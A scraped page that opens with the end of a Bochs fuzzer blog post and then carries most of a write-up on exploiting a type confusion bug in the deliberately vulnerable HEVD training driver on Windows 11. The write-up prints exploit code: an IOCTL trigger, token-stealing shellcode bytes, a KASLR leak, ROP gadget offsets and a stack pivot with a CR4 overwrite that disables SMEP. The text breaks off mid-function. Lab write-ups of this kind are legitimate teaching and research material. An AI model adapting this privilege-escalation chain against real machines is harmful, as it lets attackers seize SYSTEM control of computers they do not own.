-r path restore the Bochs state from path
-log filename specify Bochs log file name
-unlock unlock Bochs images leftover from previous session
--help display this help and exit
--help features display available features / devices and exit
--help cpu display supported CPU models and exit
For information on Bochs configuration file arguments, see the
bochsrc section in the user documentation or the man page of bochsrc.
00000000000p[ ] >>PANIC<< command line arg '-AAAAA' was not understood
00000000000e[SIM ] notify called, but no bxevent_callback function is registered
========================================================================
Bochs is exiting with the following message:
[ ] command line arg '-AAAAA' was not understood
========================================================================
00000000000i[SIM ] quit_sim called with exit code 1
Bochs runs! It couldnβt make sense of our non-sense command line arguments, but we loaded it and ran it successfully.
Next Steps
The very next step and blog post will be developing a context-switching routine that we will use to transition between Fuzzer execution and Bochs execution. This will involve saving our state each time and function basically the same way a normal user-to-kernel context switch functions.
After that, we have to get very familiar with Bochs and attempt to get a target up and running in vanilla Bochs. Once we do that, weβll try to run that in the Fuzzer.
Resources
- I used this excellent blogpost from Faster Than Lime a lot when learning about how to load ELFs in memory: https://fasterthanli.me/series/making-our-own-executable-packer/part-17.
- Also shoutout @netspooky for helping me understand the stack layout!
- Thank you to ChatGPT as well, for being my sounding board (even if you failed to help me with my stack creation bugs)
Code
It might Be Time to Rethink Phishing Awareness
CVE-2023-37250 POC
Unity Parsec TOCTOU PoC + writeup.
How a simple K-TypeConfusion took me 3 months long to create a exploit?
How a simple K-TypeConfusion took me 3 months long to create a exploit? [HEVD] - Windows 11 (buildΒ 22621)
Have you ever tested something for a really long time, that it made part of your life? thatβs what happen to me for the last months when a simple TypeConfusionvulnerability almost made me goΒ crazy!
Introduction
In this blogpost, we will talk about my experience covering a simple vulnerability that for some reason was the most hard and confuse thing that i ever have seen in a context of Kernel Exploitaiton.
We will cover about the followΒ topics:
- TypeConfusion: We will discuss how this vulnerability impact in windows kernel, and as a researcher how we can manipulate and implement an exploit from User-Landin order to get Privileged Access on the operation system.
- ROPchain: Method to make RIPregister jump through windows kernel addresses, in order to execute code. With this technique, we can actually manipulate the order of execution of our Stack, and thenceforth get access into the User-Land Shellcode.
- Kernel ASLR Bypass: Way to Leakkernel memory addresses, and with the correct base address, weβre able to calculatethe memory region which we want to use posteriorly.
- Supervisor Mode Execution Prevention (SMEP): Basically a mechanism that block all execution from user-land addresses, if it is enabled in operation system, you canβt JMP/CALLinto User-Land, so you canβt simply direct execute your shellcode. This protection come since Windows 8.0 (32/64 bits)Β version.
- Kernel Memory Managment: Important informations about how Kernel interprets memory, including: Memory Paging, Segmentations,Data Transfer, etc. Also, a description of how memory uses his data during Operation SystemΒ Layout.
- Stack Manipulation: Stack is the most notorious thing that you will see in this blogpost, all my research lies on it, and after reboot myVM million times, i actually can understand a little bit some concepts that you must consider when writing a Stack BasedΒ exploit.
VM Setup
OS Name: Microsoft Windows 11 Pro
OS Version: 10.0.22621 N/A Build 22621
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Vulnerable Driver: HackSysExtremeVulnerableDriver a.k.a HEVD.sys
Tips for Kernel Exploitation coding
Default windows functions most of the time can delay a exploitation development, because most of these functions should have βprotected valuesβ with a view to preveting misuse from attackers or people who want to modify/manipulateinternal values. According many C/C++scripts, you can find a import asΒ follows:
#include <windows.h>
#include <winternl.h> // Don't use it
#include <iostream>
#pragma comment(lib, "ntdll.lib")
<...snip...>
When a inclusion of winternl.h file is made, default values of βinnumerousβ functions are overwritten with the values defined on structson theΒ library.
// https://github.com/wine-mirror/wine/blob/master/include/winternl.h#L1790C1-L1798C33
// snippet from wine/include/winternl.h
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemCpuInformation = 1,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3, /* was SystemTimeInformation */
SystemPathInformation = 4,
SystemProcessInformation = 5,
SystemCallCountInformation = 6,
SystemDeviceInformation = 7,
<...snip...>
The problem is, when you manipulating and exploiting functions from User-Land like NtQuerySystemInformationin βrecentβ windows versions, these defined values are βdifferentβ, blocking and preveting the use of it functions which can have some ability to leak kernel base addresses, consequently delaying our exploitation phase. So, itβs import to make sure that a code is crafted by ignoring winternl.h and posteriorly by utilizing manually structs definitions as exampleΒ below:
#include <iostream>
#include <windows.h>
#include <ntstatus.h>
#include <string>
#include <Psapi.h>
#include <vector>
#define QWORD uint64_t
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemProcessInformation = 5,
SystemProcessorPerformanceInformation = 8,
SystemModuleInformation = 11,
SystemInterruptInformation = 23,
SystemExceptionInformation = 33,
SystemRegistryQuotaInformation = 37,
SystemLookasideInformation = 45
} SYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG NumberOfModules;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
// Function pointer typedef for NtDeviceIoControlFile
typedef NTSTATUS(WINAPI* LPFN_NtDeviceIoControlFile)(
HANDLE FileHandle,
HANDLE Event,
PVOID ApcRoutine,
PVOID ApcContext,
PVOID IoStatusBlock,
ULONG IoControlCode,
PVOID InputBuffer,
ULONG InputBufferLength,
PVOID OutputBuffer,
ULONG OutputBufferLength
);
// Loads NTDLL library
HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile function
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));
INT64 GetKernelBase() {
// Leak NTDLL.sys base address in order to KASLR bypass
DWORD len;
PSYSTEM_MODULE_INFORMATION ModuleInfo;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!ModuleInfo) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;
}
With this technique, now weβre able to use all correct structsvalues without any troubles.
TypeConfusion vulnerability
Utilizing IDA Reverse Engineering Tool, we can clearly see the correct IOCTLwhich execute our vulnerable function.
After reversing TriggerTypeConfusion, we have the followΒ code:
// IDA Pseudo-code into TriggerTypeConfusion function
__int64 __fastcall TriggerTypeConfusion(_USER_TYPE_CONFUSION_OBJECT *a1)
{
_KERNEL_TYPE_CONFUSION_OBJECT *PoolWithTag; // r14
unsigned int v4; // ebx
ProbeForRead(a1, 0x10ui64, 1u);
PoolWithTag = (_KERNEL_TYPE_CONFUSION_OBJECT *)ExAllocatePoolWithTag(NonPagedPool, 0x10ui64, 0x6B636148u);
if ( PoolWithTag )
{
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Type: %s\n", "NonPagedPool");
DbgPrintEx(0x4Du, 3u, "[+] Pool Size: 0x%X\n", 16i64);
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] UserTypeConfusionObject: 0x%p\n", a1);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject Size: 0x%X\n", 16i64);
PoolWithTag->ObjectID = a1->ObjectID; // USER_CONTROLLED PARAMETER
PoolWithTag->ObjectType = a1->ObjectType; // USER_CONTROLLED PARAMETER
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectID: 0x%p\n", (const void *)PoolWithTag->ObjectID);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectType: 0x%p\n", PoolWithTag->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Triggering Type Confusion\n");
v4 = TypeConfusionObjectInitializer(PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] Freeing KernelTypeConfusionObject Object\n");
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
ExFreePoolWithTag(PoolWithTag, 0x6B636148u);
return v4;
}
else
{
DbgPrintEx(0x4Du, 3u, "[-] Unable to allocate Pool chunk\n");
return 3221225495i64;
}
}
As you can see, the function is expecting two values from a user-controlled struct named _KERNEL_TYPE_CONFUSION_OBJECT, this struct contains (ObjectID, ObjectType)as parameters, and after parse these objects, it utilizes TypeConfusionObjectInitializerwith our objects. The vulnerable code follows asΒ bellow:
__int64 __fastcall TypeConfusionObjectInitializer(_KERNEL_TYPE_CONFUSION_OBJECT *KernelTypeConfusionObject)
{
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->Callback: 0x%p\n", KernelTypeConfusionObject->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Calling Callback\n");
((void (*)(void))KernelTypeConfusionObject->ObjectType)(); // VULNERABLE
DbgPrintEx(0x4Du, 3u, "[+] Kernel Type Confusion Object Initialized\n");
return 0i64;
}
The vulnerability in the code above is implict behind the unrestricted execution of _KERNEL_TYPE_CONFUSION_OBJECT->ObjectTypewhich pointer to an user-controlled address.
Exploit Initialization
Knowing about our vulnerability, now weβll get focused into exploitΒ phases.
First of all, we craft our code in order to communicate to our HEVDdriver IRPutilizing previously got IOCTL -> 0x22202, and after that send our malicious buffer.
<...snip...>
// ---> Malicious Struct <---
typedef struct USER_CONTROLLED_OBJECT {
INT64 ObjectID;
INT64 ObjectType;
};
HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));
HANDLE setupSocket() {
// Open a handle to the target device
HANDLE deviceHandle = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
nullptr,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
nullptr
);
if (deviceHandle == INVALID_HANDLE_VALUE) {
//std::cout << "[-] Failed to open the device" << std::endl;
FreeLibrary(ntdll);
return FALSE;
}
return deviceHandle;
}
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = 0xDEADBEEFDEADBEEF; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
int main() {
exploit();
return 0;
}
Then after we send our buffer, _KERNEL_TYPE_CONFUSION_OBJECTshould be likeΒ this.
Now we can cleary understand where exactly this vulnerability lies. The next step should be to JMP into our user-controlled buffer containing some shellcode that can escalate SYSTEM PRIVILEGES, the issue with this idea lies behind a protection mechanism called SMEP. Supervisor Mode Execution Prevention, a.k.aΒ (SMEP).
Supervisor Mode Execution Prevention (SMEP)
The main idea behind SMEPprotection is to preveting CALL/JMP into user-landaddresses. If SMEPkernel bitis set to [1], it provides a security mechanism that protectmemory pages from userΒ attacks.
According to Core Security,
SMEP: Supervisor Mode Execution Prevention allows pages to
be protected from supervisor-mode instruction fetches. If
SMEP = 1, software operating in supervisor mode cannot
fetch instructions from linear addresses that are accessible in
userΒ mode
- Detects RING-0 code running in USER SPACE
- Introduced at Intel processors based on the Ivy Bridge architecture
- Security feature launched in 2011
- Enabled by default since Windows 8.0 (32/64 bits)
- Kernel exploit mitigation
- Specially "Local Privilege Escalationβ exploits
must now consider thisΒ feature.
Then letβs see in a pratical test if it is actually working properly.
<...snip...>
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)shellcode; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
<...snip...>
After exploit execution we got something likeΒ this:
The BugCheckanalysis should be similar as aΒ follows:
ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)
An attempt was made to execute non-executable memory. The guilty driver
is on the stack trace (and is typically the current instruction pointer).
When possible, the guilty driver's name is printed on
the BugCheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: 0000000080000000, Virtual address for the attempted execute.
Arg2: 00000001db4ea867, PTE contents.
Arg3: ffffb40672892490, (reserved)
Arg4: 0000000080000005, (reserved)
<...snip...>
As we can see, SMEPprotection looks working right, the follow steps will cover how do we can manipulate our addresses in order to enable our shellcode buffer to be executed by processor.
Returned-Oriented-Programming againstΒ SMEP
Returned-Oriented-Programminga.k.a (ROP), is technique that allows any attacker to manipulate the instruction pointers and returned addresses in the current stack, with this type of attack, we can actually perform a programming assembly only with execution between address toΒ address.
As CTF101 mentioned:
Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complexΒ things.
As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwritesaved instruction pointers, giving us control over what the program does next. Most programs donβt have a convenient give_shell function however, so we need to find a way to manually invoke system or another exec function to get us ourΒ shell.
The main idea for our exploit lies behind the utilization of a ROP chain with a view to achieve arbitrary code execution. ButΒ how?
x64 CR4Β register
As part of a Control Registers, CR4register basically holds a bit value that can changes between Operation Systems.
When SMEPis implemented, a default value is used in the current OS to check if SMEP still enabled, and with this information kernel can knows if through his execution, should be possible or not to CALL/JMPinto user-land addresses.
As Wikipedia says:
A control register is a processor register that changes or controls the general behavior of a CPU or other digital device. Common tasks performed by control registers include interrupt control, switching the addressing mode, paging control, and coprocessor control.
CR4
Used in protected mode to control operations such as virtual-8086 support, enabling I/O breakpoints, page size extension and machine-check exceptions.
In my Operation System Build Windows 11 22621we can cleary see this register value inΒ WinDBG:
At now, the main idea is about to flipthe correct bit, in order to neutralize SMEP execution, and after that JMPinto attacker shellcode.
Now, with this in mind, we need get back into our exploit source-code, and craft our ROP chainto achieve our goal. The question is,Β how?
At now, we know that we need change CR4value and a ROP chaincan help us, also we actually need at first to bypass Kernel ASLRdue the randomization between addresses in this land. The follow steps weβll cover how to get the correct gadgetsto followΒ attacks.
Virtualization-based securityΒ (VBS)
With CR4register manipulation through ROP chainattacks, itβs important to notice that when a miscalculation is done by an attacker in the bit change exploit phase,if Virtualization-based securitybit is enabled, system catch exception and crashes after a change attempt of CR4 registerΒ value.
According to Microsoft:
Virtualization-based security (VBS) enhancements provide another layer of protection against attempts to execute malicious code in the kernel. For example, Device Guard blocks code execution in a non-signed area in kernel memory, including kernel EoP code. Enhancements in Device Guard also protect key MSRs, control registers, and descriptor table registers. Unauthorized modifications of the CR4 control register bitfields, including the SMEPfield, are blocked instantly.
If for some reason, you see an error as below, itβs a probably miscalculation of a the value which should be placed into CR4register.
<...snip...>
// A example of miscalculation of CR4 address
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0xFFFFFF; // ---> WRONG CR4 value
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
WinDBG output:
KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000004, The thread's stack pointer was outside the legal stack
extents for the thread.
Arg2: 0000000047fff230, Address of the trap frame for the exception that caused the BugCheck
Arg3: 0000000047fff188, Address of the exception record for the exception that caused the BugCheck
Arg4: 0000000000000000, Reserved
EXCEPTION_RECORD: 0000000047fff188 -- (.exr 0x47fff188)
ExceptionAddress: fffff80631091b99 (nt!RtlpGetStackLimitsEx+0x0000000000165f29)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000004
Subcode: 0x4 FAST_FAIL_INCORRECT_STACK
PROCESS_NAME: TypeConfusionWin11x64.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system has detected a stack-based buffer overrun in this application. It is possible that this saturation could allow a malicious user to gain control of the application.
EXCEPTION_CODE_STR: c0000409
EXCEPTION_PARAMETER1: 0000000000000004
EXCEPTION_STR: 0xc0000409
KASLR Bypass with NtQuerySystemInformation
NtQuerySystemInformationAs mentioned before, is a function that if configured correctly can leak kernel lib base addresses once perform system query operations. As return of these queries, we can actually leak memory from user-land.
As mentioned by TrustedWave:
The function NTQuerySystemInformation is implemented on NTDLL. And as a kernel API, it is always being updated during the Windows versions with no short notice. As mentioned, this is a private function, so not officially documented by Microsoft. It has been used since early days from Windows NT-family systems with different syscallΒ IDs.
<β¦snipβ¦>
The function basically retrieves specific information from the environment and its structure is veryΒ simple
<β¦snipβ¦>Β΄
There are numerous data that can be retrieved using these classes along with the function. Information regarding the system, the processes, objects andΒ others.
So, now we have a question, if we can leakaddresses and calculate the correct offset of the base of these addresses to our gadget, how can we search in memory for theseΒ ones?
The solution is simple asΒ follows:
1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ROPgadget.py --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt
With the file ROP.txt, we have addresses but weβre still βunableβ to get the correct ones to implement a valid calculation.
Ntdllfor exemple, utilizes addresses from his module as βbuffersβ sometimes, and the data can point for another invalid one. At kernel level, functions βchangesβ, and between all these βchangesβ you will never hit the correct offset through a simpleΒ .writememdump.
The biggest issue lies behind when aΒ .writemem is used, it dumps the start and end of a defined module, but it automatically donβt align correctly the offset of functions. It happens due module segmentsand malleable data which can change time by time for the properly OS workΒ . For example, if we search for opcodesutilizing WinDBGcommand line, thereβs a static buffer address which returns exatcly the opcodes that weΒ send.
The addresses above seems to be valid, and they are identical due our opcodes, the problem is that 0xffffff80051ef8500 is a buffer and it returns everything we put into WinDBGsearch function [s command]. So, no matter how you changesopcode, it always returns back in aΒ buffer.
Ok, now letβs say that ROPGadget.py return as the followΒ output:
--> 0xfffff800516a6ac4 : pop r12 ; pop rbx ; pop rbp ; pop rdi ; pop rsi ; ret
0xfffff800514cbd9a : pop r12 ; pop rbx ; pop rbp ; ret
0xfffff800514d2bbf : pop r12 ; pop rbx ; ret
0xfffff800514b2793 : pop r12 ; pop rcx ; ret
If we try to check if that opcodesare the same in our current VM, weβll notice something likeΒ this:
As you can see, the offset fromΒ .writememis invalid, meaning that something went wrong. A simple fix for this issue is by looking into our ROPGadgetsand see what assembly code that we need, and thenceforth we convert this code into opcode, so with that we can freely search into current valid memory the addresses to start our ROPΒ chain.
4 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
5 - kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
6 - kd> u nt!ExfReleasePushLock+0x20
nt!ExfReleasePushLock+0x20:
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
7 - kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0
Now we know that ntdll base address 0xffffff8005120000 + 0x00000000002ce4c0will result into nt!ExfReleasePushLock+0x20function.
Stack Pivoting & ROPΒ chain
With previously idea of what exatcly means aROP chain, now itβs important to know what gadget do we need to change CR4register value utlizing only kernel addresses.
STACK PIVOTING:
mov esp, 0x48000000
ROP CHAIN:
POP RCX; ret // Just "pop" our RCX register to receive values
<CR4 CALCULATED VALUE> // Calculated value of current OS CR4 value
MOV CR4, RCX; ret // Changes current CR4 value with a manipulated one
// The logic for the ROP chain
// 1 - Allocate memory in 0x48000000 region
// 2 - When we moves 0x48000000 address to our ESP/RSP register
we actually can manipulated the range of addresses that we'll [CALL/JMP].
Now knowing about ourROP chain logic, we need to discuss about Stack Pivoting technique.
Stack pivoting basically means the changes of current Kernel stack into a user-controlled Fake Stack, this modification can be possible by changing RSP register value. When we changes RSP value to a user-controlled stack, we can actually manipulate it execution through a ROP chain, once we can do a programming returning into kernel addresses.
Getting back into the code, we implement our attacker FakeΒ Stack.
<...snip...>
typedef struct USER_CONTROLLED_OBJECT {
INT64 ObjectID;
INT64 ObjectType;
};
typedef struct _SMEP {
INT64 STACK_PIVOT;
INT64 POP_RCX;
INT64 MOV_CR4_RCX;
} SMEP;
<...snip...>
// Leak base address utilizing NtQuerySystemInformation
INT64 GetKernelBase() {
DWORD len;
PSYSTEM_MODULE_INFORMATION ModuleInfo;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!ModuleInfo) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;
}
SMEP SMEPBypass = { 0 };
int SMEPBypassInitializer() {
INT64 NT_BASE_ADDR = GetKernelBase(); // ntoskrnl.exe
std::cout << std::endl << "[+] NT_BASE_ADDR: 0x" << std::hex << NT_BASE_ADDR << std::endl;
INT64 STACK_PIVOT = NT_BASE_ADDR + 0x002ce4c0;
SMEPBypass.STACK_PIVOT = STACK_PIVOT;
std::cout << "[+] STACK_PIVOT: 0x" << std::hex << STACK_PIVOT << std::endl;
/*
1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ROPgadget.py --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt
*******************************************************************************
kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
kd> u nt!ExfReleasePushLock+0x20
nt!ExfReleasePushLock+0x20:
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0
*/
INT64 POP_RCX = NT_BASE_ADDR + 0x0021d795;
SMEPBypass.POP_RCX = POP_RCX;
std::cout << "[+] POP_RCX: 0x" << std::hex << POP_RCX << std::endl;
/*
kd> s fffff800`51200000 L?01047000 41 5C 59 C3
fffff800`5141d793 41 5c 59 c3 cc b1 02 e8-21 06 06 00 eb c1 cc cc A\Y.....!.......
fffff800`5141f128 41 5c 59 c3 cc cc cc cc-cc cc cc cc cc cc cc cc A\Y.............
fffff800`5155a604 41 5c 59 c3 cc cc cc cc-cc cc cc cc 48 8b c4 48 A\Y.........H..H
kd> u fffff800`5141d795
nt!KeClockInterruptNotify+0x2ff5:
fffff800`5141d795 59 pop rcx
fffff800`5141d796 c3 ret
kd> ? fffff800`5141d795 - fffff800`51200000
Evaluate expression: 2217877 = 00000000`0021d795
*/
INT64 MOV_CR4_RDX = NT_BASE_ADDR + 0x003a5fc7;
SMEPBypass.MOV_CR4_RCX = MOV_CR4_RDX;
std::cout << "[+] MOV_CR4_RDX: 0x" << std::hex << POP_RCX << std::endl << std::endl;
/*
kd> u nt!KeFlushCurrentTbImmediately+0x17
nt!KeFlushCurrentTbImmediately+0x17:
fffff800`515a5fc7 0f22e1 mov cr4,rcx
fffff800`515a5fca c3 ret
kd> ? fffff800`515a5fc7 - fffff800`51200000
Evaluate expression: 3825607 = 00000000`003a5fc7
*/
return TRUE;
}
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
